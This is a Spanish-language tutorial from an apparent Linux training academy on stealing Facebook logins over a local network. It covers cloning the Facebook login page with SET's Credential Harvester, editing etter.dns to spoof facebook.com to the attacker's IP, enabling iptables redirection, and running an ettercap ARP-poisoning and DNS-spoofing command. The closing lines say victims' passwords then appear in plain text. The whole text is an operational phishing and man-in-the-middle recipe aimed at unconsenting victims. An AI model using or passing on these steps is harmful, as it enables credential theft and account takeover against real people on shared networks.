1. Academia Código Libre www.codigolibre.org www.acl.edu.do
__________________________________________________________________________________
Hacking Facebook Con SET Toolkit
Diciembre 2012
Documentacion Realizada Por:
Michael Cruz Sanchez
GNU/Instructor
Herramientas A Utilizar:
1. SET (Social-Engineer Toolkit)
2. Ettercap
3. Centos 6.3
4. Metasploit Framework
Descargar y instalar metasploit en /opt
(http://downloads.metasploit.com/data/releases/metasploit-latest-linux-
installer.run)
Descargar y instalar SET en /opt(svn co
http://svn.trustedsec.com/social_engineering_toolkit set/)
Instalar ettercap
# yum install ettercap* -y
NOTA: Este es un manual paso a paso de como efectuar un ataque a facebook con
las herramientas SET, metasploit y ettercap, algunos conceptos tendran que
buscarlos en google para mejor entendimiento. Ya que este manual en parte no
esta dirigido a principiantes.
Social-Engenieer Toolkit es un juego de herramientas de explotacion creado por
David Kennedy y la comunidad, en la cual han incorporado los ataques nunca visto
en una herramienta similar. Los ataques integrados en el kit de herramientas se
han desarrollado para ser dirigidos a personas o empresas, o como modo de pruebas
Paqueteria Debian
2. Academia Código Libre www.codigolibre.org www.acl.edu.do
de penetracion de sistemas. Es la herramienta que utilizaremos para clonar la
pagina de Facebook.
Ettercap es una herramienta de sniffing y seguridad de redes para M-I-M (Main In
The Middle Attack)http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle en LAN, se ejecuta en
varios sistemas operativos tipo Unix como GNU/Linux, Mac OS X, BSD y Solaris, y en
Microsoft Window. Es capaz de interceptar trafico en un segmento de red, la
captura de claves, y la realizacion de escucha activa contra una serie de
protocolos comunes. Esta clasificado en el numero 11 de los Top 100 Network
Security dada a conocer por insecure.org en 2006.
Imagen de un ataque M-I-M
Escenario De Ataque:
1. Elegir una pagina al cual atacar, y clonarla con SET
2. Inicar un ataque Main In The Middle entre la victima y el router
3. Spoofear la pagina a tu direccion ip
4. Esperar a que la victima acceda a la pagina
Paqueteria Debian
3. Academia Código Libre www.codigolibre.org www.acl.edu.do
Paso 1: www.facebook.com
En nuestro caso elegimos facebook para clonar, iniciamos la herramienta SET desde
nuestro shell.
#/opt/./set
Luego de que nuestra herramienta SET se inicie nos mostrara varias opciones,
pulsamos la opcion numero 1) Social-Engineering Attacks.
Luego la opcion numero 2) Website Attack Vectors, para luego ir a la opcion numero
3) Credential Harvester Attack Method, una vez pulsada esa opcion volvemos a la
opcion 2) Site Cloner. Aqui nos pedira que pongamos nuestra direccion ip, en mi
caso es 192.168.100.92 cambiar por la direccion ip correcta de su tarjeta de red,
luego nos dira Enter the url to clone:___________ aqui pondremos www.facebook.com.
En esta parte que estamos haciendo es redireccionando la direccion web
www.facebook.com a nuestra direccion ip, asi la maquina victima creera que nuestra
maquina es facebook y nos enviara toda la informacion en archvios html generados
por la herramienta SET.
Antes de lanzar el Dns-spoofing (buscar wikipedia) con la herramienta ettercap
tenemos que editar el archivo de configuracion /usr/share/ettercap/etter.dns y
redireccionar facebook.com a nuestra direccion IP de la siguiente manera.
Dentro del archivo debajo de donde dice www.microsoft.com PTR 198.182.196.56
ponemos lo siguiente:
*.facebook.com A 192.168.100.92
NOTA: 192.168.100.92 es mi direccion ip cambiar este valor por el verdadero.
Con esto le estamos diciendo a ettercap que haga un spoof de facebook a nuestra
direccion ip. Osea que todas las peticiones de facebook lleguen a nuestra maquina.
Luego de todo esto nos vamos al archivo de configuracion de ettercap en /etc
llamado /etc/ettercap.conf y en la seccion donde decie LINUX deshabilitamos las
partes del comando Iptables el cual se encargara de las redirecciones.
# vim /etc/ettercap.conf
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port
-j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport
%port -j REDIRECT --to-port %rport"
Debe quedar asi, luego salimos y guardamos.
Paqueteria Debian
4. Academia Código Libre www.codigolibre.org www.acl.edu.do
Ahora procedemos a lanzar ettercap para escanear los host y hacer las
redirecciones necesarias para nuestro ataque y asi poder encontrar victimas en la
red. Pueden correr ettercap graficamente ejecutando como usuario root el comando
ettercap -G pero aqui lo correremos desde la terminal, es mas productivo.
# ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
NOTA: la tarjeta de red es wlan0 porque estoy conectado desde la wireless, cambiar
por la tarjeta de red donde esten conectados.
Con esto esta todo listo solo hay que esperar que una victima acceda a facebook y
podremos ver toda la informacion en /opt/set/reports en archivos con extension
.html abrir con cualquier navegador y veran los datos de la victima en texto
plano.
Michael Cruz Sanchez
GNU/Instructor
superlinux.michael5@gmail.com
Paqueteria Debian